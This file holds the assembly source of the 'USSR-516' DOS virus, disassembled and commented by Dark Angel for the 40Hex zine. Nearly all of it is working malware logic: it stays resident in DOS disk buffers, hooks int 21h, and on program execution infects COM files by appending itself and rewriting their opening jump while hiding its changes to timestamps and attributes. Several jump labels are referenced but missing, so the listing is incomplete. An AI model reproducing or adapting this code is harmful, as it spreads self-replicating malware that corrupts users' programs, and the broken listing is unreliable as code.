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synced 2025-02-11 17:32:03 +00:00
281 lines
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281 lines
13 KiB
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ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
;Disassembled by Dark Angel of PHALCON/SKISM
;for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
;This is where the virus really begins
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ;Actually it's int 21h
;entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ;BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ;DI -> orig4
movsw ;restore original
movsw ;4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ;int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ;Bug????
inc di
cmp word ptr [di-2],0E18Ah ;Find marker bytes
jne findmarker ;to the entry point
mov [bp+4],di ;and move to
mov [bp+6],ds ;int30store
mov ax,5252h ;Get list of lists
int 21h ;and also ID check
add bx,12h ;Already installed?
jz quitvir ;then exit
push bx
mov ah,30h ;Get DOS version
int 21h
pop bx ;bx = 12, ptr to 1st
;disk buffer
cmp al,3
je handlebuffer ;if DOS 3
ja handleDBHCH ;if > DOS 3
inc bx ;DOS 2.X, offset is 13
push ds
push bx
lds bx,dword ptr [bx] ;Get seg:off of buffer
inc si
pop di
pop es ;ES:DI->seg:off buff
mov ax,[bx] ;ptr to next buffer
cmp ax,0FFFFh ;least recently used?
jne handlebuffer ;if not, go find it
cmp si,3
jbe quitvir
jmp short movetobuffer
handleDBHCH: ;Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ;ptr to disk buffer
lodsw ;info
lodsw ;seg of disk buffer
;hash chain head array
inc ax ;second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ;EMS page, -1 if not
;in EMS
xchg ax,di ;save in di
lodsw ;ptr to least recently
;used buffer
mov [di+2],ax ;change disk buffer
;backward offset to
;least recently used
xchg ax,di ;restore EMS page
mov [di],ax ;set to least recently
movetobuffer: ;used
mov di,bx
push ds
pop es ;ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ;Copy from start
rep movsw
mov ds,cx ;DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ;New interrupt handler
mov word ptr ds:[4*21h+2],es ;at int21
push cs ;CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ;set up stack for
push si ;the return to the
retn ;original program
mov al,3 ;Ignore all errors
tickstore db 3 ;Why???
buffer db 3, 0, 9, 0
cli ;CP/M style call entry
call dword ptr cs:[int30store-start]
retn ;point of int 21h
int21DSDX: ;For int 21h calls
push ds ;with
lds dx,dword ptr [bp+2] ;DS:DX -> filename
call int21
pop ds
cmp ax,4B00h ;Execute
je Execute
cmp ax,5252h ;ID check
je CheckID
cmp ah,30h ;DOS Version
je DosVersion
callorig21: ;Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ;Why????? ;DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ;Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ;# 2-17
pop ax
pop es
CheckID: ;ID Check
mov bx,0FFEEh ;FFEEh = -12h
Execute: ;Execute
push ax ;Save registers
push cx
push es
push bx
push ds ;DS:DX -> filename
push dx ;save it on stack
push bp
mov bp,sp ;Set up stack frame
sub sp,0Ah ;Temporary variables
;[bp-A] = attributes
;[bp-8] = int 24 off
;[bp-6] = int 24 seg
;[bp-4] = file time
;[bp-2] = file date
push cs
pop ds
mov ax,3301h ;Turn off ^C check
xor dl,dl ;(never turn it back
call int21 ; on. Bug???)
mov ax,3524h ;Get int 24h
call int21 ;(Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ;Set to new one
call int21
mov ax,4300h ;Get attributes
call int21DSDX
jnc continue
mov ax,2524h ;Restore crit error
lds dx,dword ptr [bp-8] ;handler
call int21
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ;Call orig handler
mov [bp-0Ah],cx ;Save attributes
test cl,1 ;Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ;Clear attributes
call int21DSDX ;Filename in DS:DX
jc doneinfect ;Quit on error
mov ax,3D02h ;Open read/write
call int21DSDX ;Filename in DS:DX
jc doneinfect ;Exit if error
mov bx,ax
mov ax,5700h ;Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ;Read 4 bytes to
call int21 ;buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h
jne quitinf ;Otherwise, quit
mov dx,word ptr ds:[buffer+1-start];dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ;go there
call int21
mov ds:[buffer-start],ax ;new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ;Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ;0E9h means we might
jne infect ;already be there
mov ax,ds:[orig4+2-start] ;continue checking
add al,dh ;to see if we really
sub al,ah ;are there.
jz quitinf
xor cx,cx
mov dx,cx
mov ax,4202h ;Go to EOF
call int21
mov ds:[buffer+2-start],ax ;save filesize
mov cx,204h
mov ah,40h ;Write virus
call int21
jc quitinf ;Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ;AX->jmp offset
mov word ptr ds:[buffer+1-start],ax;Set up buffer
mov byte ptr ds:[buffer-start],0E9h;code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ;Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ;Write in the jmp
mov ah,40h
call int21
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ;Restore date/time
call int21
mov ah,3Eh ;Close file
call int21
mov cx,[bp-0Ah] ;Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ;Return
ussr516 ends
end stub